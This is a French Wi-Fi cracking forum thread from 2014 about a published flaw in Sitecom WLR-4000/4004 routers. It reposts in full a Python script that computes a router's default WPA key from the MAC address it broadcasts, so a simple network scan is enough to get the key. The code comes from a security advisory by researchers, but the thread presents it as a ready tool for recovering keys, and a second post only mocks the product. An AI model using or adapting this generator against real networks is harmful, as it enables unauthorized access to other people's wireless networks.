Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 28-04-2014 08:29:23

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Clef WPA des Sitecom WRL 4000 et 4004

h_1398667985_9486973_d792b27b86.png




h_1398667655_6789535_7492d96a79.png

wi-fi gigabit routern300 wlr 4004



auteurs            Roberto Paleari     (@rpaleari)
                     Alessandro Di Pinto (@adipinto)


Page web         Emaze : Sitecom firmware encryption and wireless keys

Vu sur             Packet storm /  Sitecom WLR-4000 / WLR-4001 Weak Encryption / Predictable WPA Key



     Encore une fois c'est en fouinant dans le firmware que de fil en aiguille les deux compères ont "reversé" l'algorithme de génération des clefs WPA.
     Comme il se base sur l'adresse mac broadcasté la boucle est bouclée et nous pouvons déduire la clé WPA en nous servant d'une simple scan de réseau.

    Il y a un détail croustillant dans l'histoire... big_smile

    Si vous avez la flemme de lire le full disclosure du lien mis plus haut en résumé,
    Le firmware était offusqué avec un encryptage  XOR basique.
    Une fois que le firmware pu être mi au clair, le détail croustillant arrive, allesandro et roberto on du rigoler un bon coup en voyant apparaître une fonction ( qu'il qualifient de "suspect" dans leur article big_smile)  appelée

generate_wpa2_key_based_on_mac()

   
  On peut dire que les gars sont précis quant au nom de leurs fonctions, ça on ne peut pas leur reprocher,

  IL y a un script en python, je n'ai pas vraiment compris le détail des opérations, les charsets sont différents selon modèles, la clef générée est de 12 caractères et se base sur la mac

def generateKey(mac, model, keylength = 12):

et après il me semble que il y a 3 chaines magiques et du xor mas je me perds... voici le code



# 
# Default WPA key generator for Sitecom WLR-4000/4004 routers
# ===========================================================
#
# Authors: 
#   Roberto Paleari     (@rpaleari)
#   Alessandro Di Pinto (@adipinto)
#
# Advisory URL:
#   http://blog.emaze.net/2014/04/sitecom-firmware-and-wifi.html
# 

import argparse
import os
import logging
import sys

# Charsets used for the generation of WPA key by different Sitecom models
CHARSETS = {
    "4000": (
        "23456789ABCDEFGHJKLMNPQRSTUVWXYZ38BZ",
        "WXCDYNJU8VZABKL46PQ7RS9T2E5H3MFGPWR2"
    ),

    "4004": (
        "JKLMNPQRST23456789ABCDEFGHUVWXYZ38BK", 
        "E5MFJUWXCDKL46PQHAB3YNJ8VZ7RS9TR2GPW"
    ),
}

def generateKey(mac, model, keylength = 12):
    global CHARSETS
    assert model in CHARSETS
    
    charset1, charset2 = CHARSETS[model]
    assert len(charset1) == len(charset2)

    mac = mac.replace(":", "").decode("hex")
    assert len(mac) == 6

    val = int(mac[2:6].encode("hex"), 16)

    magic1 = 0x98124557
    magic2 = 0x0004321a
    magic3 = 0x80000000

    offsets = []
    for i in range(keylength):
        if (val & 0x1) == 0:
            val = val ^ magic2
            val = val >> 1
        else:
            val = val ^ magic1
            val = val >> 1
            val = val | magic3

        offset = val % len(charset1)
        offsets.append(offset)

    wpakey = ""
    wpakey += charset1[offsets[0]]

    for i in range(0, keylength-1):
        magic3 = offsets[i]
        magic1 = offsets[i+1]

        if magic3 != magic1:
            magic3 = charset1[magic1]
        else:
            magic3 = (magic3 + i) % len(charset1)
            magic3 = charset2[magic3]
        wpakey += magic3

    return wpakey
        

def main():
    global CHARSETS

    # Parse command-line arguments
    parser = argparse.ArgumentParser(formatter_class = 
                                     argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument("-m", "--model", choices = CHARSETS.keys(),
                        required = True, help = "device model")
    parser.add_argument('mac', help = "MAC address")
    args = parser.parse_args()

    # Configure logging
    logging.basicConfig(format = '[%(asctime)s] %(levelname)s : %(message)s',
                        level = logging.DEBUG)

    # Generate SSID and WPA key
    ssid = "Sitecom%s" % args.mac.replace(":", "")[6:].upper()
    wpa = generateKey(args.mac, args.model)

    print "MAC:  %s" % args.mac
    print "SSID: %s" % ssid
    print "WPA:  %s" % wpa


if __name__ == "__main__":
    main()

wlr-genpsk.py

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 28-04-2014 09:37:16

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Clef WPA des Sitecom WRL 4000 et 4004

Pour vendre cette daub 60 euros dans le commerce... la honte.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
19 1124 05-09-2016 17:32:03 par david_01
Aide pour crack clef WPA par BloodBurn  [ 1 2 ]
25 1234 12-08-2016 11:51:16 par Seska
Épinglée :
Épinglée :: Technique de recuperation de clef WPA par rogue et PHP. par webcapitain  [ 1 2 3 12 ]
276 99847 30-05-2016 14:56:43 par cir0
5 818 17-09-2015 12:58:54 par fredo6240
6 876 09-08-2015 11:54:35 par scuz2

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.032 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]